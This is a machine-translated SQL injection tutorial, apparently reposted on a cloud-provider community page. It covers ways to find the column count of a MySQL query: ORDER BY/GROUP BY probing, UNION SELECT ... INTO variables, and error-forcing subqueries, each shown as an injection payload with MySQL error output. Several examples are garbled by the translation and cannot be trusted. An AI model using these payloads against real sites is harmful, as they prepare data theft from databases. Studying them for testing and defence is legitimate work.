SQL injection Knowledge Base-mysql article (3)

Source: Internet
Author: User
Tags knowledge base

SQL injection Knowledge Base-mysql (2)

Tables and fields

First, the number of detection fields

Order By/group by

Group By/order by +1;

Note:

Both order by and group by are used to sort by fields.

Keep the number continuously increasing until you get an error response

Although group by and order by are different features in SQL, they can confirm the number of columns in the query in exactly the same way

Examples

Given the querySELECT username, password, permission FROM Users WHERE id = ‘{INJECTION POINT}‘;

1 ' ORDER by 1--+ True

Restore the Select Username,password,permission from the users where id = ' 1 ' ORDER by 1--+

From the Users table, query ID = 1 for username, password permission and then in ascending order by the first field (username)

1 ' ORDER by 2--+ True

。。。。

1 ' ORDER by 4--+ False indicates that the table has a total of 3 columns

1 ' Union Select------

Based on Error 1

Group BY or ORDER by 1,2,3,4,5 ...

Similar to the method mentioned above, we can judge the number of fields by a request to see if the error mode is started.

Examples

SELECT * FROM student where id = 1 order by; True

SELECT * FROM student where id = 1 ORDER by 1,2,3,4; True

SELECT * FROM student where id = 1 ORDER by 1,2,3,4,5; Return ERROR 1054 (42S22): Unknown column ' 5 ' in ' order clause '

Indicates that the table field has only 4 columns

SELECT * FROM student where id = 1 GROUP by 1,2,3,4,5; Return ERROR 1054 (42S22): Unknown column ' 5 ' in ' group statement '

Indicates that the table field has only 4 columns

Based on Error 2

Select ... into var_list, Var_list1, Var_list2 ....

1. If the error mode is turned on, this method will work correctly

2. is a practical way to find the number of fields, when there is a limit clause behind the injection point.

Examples

Given the querySELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 Union Select 1 into @,@,@ The used SELECT statements has a different number of columns

-1 Union Select 1 into @ If the error is not indicated, the query information uses a

Mysql> Select Name,id1 from student limit + into @;
ERROR 1222 (21000): The used SELECT statements has a different number of columns
Mysql> Select Name,id1 from student limit to @,@;
Query OK, 1 row Affected (0.00 sec)

Field

Instance

Mysql> select name from student where id =-1 union select 1 into @; You can see that the query uses the Name field, so you won't get an error after using select 1 into @
Query OK, 1 row Affected (0.00 sec)

Mysql> Select NAME,ID1 from student where id =-1 union SELECT, into @,@; The name and id1 two fields are used here, so the corresponding use of the-into @,@ will not result in an error.
Query OK, 1 row Affected (0.00 sec)

Examples

Given the querySELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 into @,@,@ error The used SELECT statements has a different number of columns

1 into @,@ no error indicates that there are 2 fields in the query

Instance:

Select NAME,ID1 from student limit to into @;
ERROR 1222 (21000): The used SELECT statements has a different number of columns
Select Name,id1 from student limit, into @,@;
Query OK, 1 row Affected (0.00 sec)

Limit usage:

Limit start position, take several select Name,id from student limit 0, 1;   Remove the first data from the student table select Name,id from student limit 1, 1;  Remove the second data from the student table select Name,id from student limit 0, 3; Remove 3 data from the student table, starting with the first one

Based on Error 3

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

Note:

Working in an environment where you know the table name but do not enable error echo, it returns the number of fields

Example

Given the querySELECT permission FROM Users WHERE id = {INJECTION POINT};

1 and (SELECT * from student) = 1

Instance:
Select Name,id from student where id = 1 and (SELECT * from student) = 1;

ERROR 1241 (21000): Operand should contain 4 column (s)


Select Name,id from student where id = 1 and (SELECT * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column (s)

SQL injection Knowledge Base-mysql article (3)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.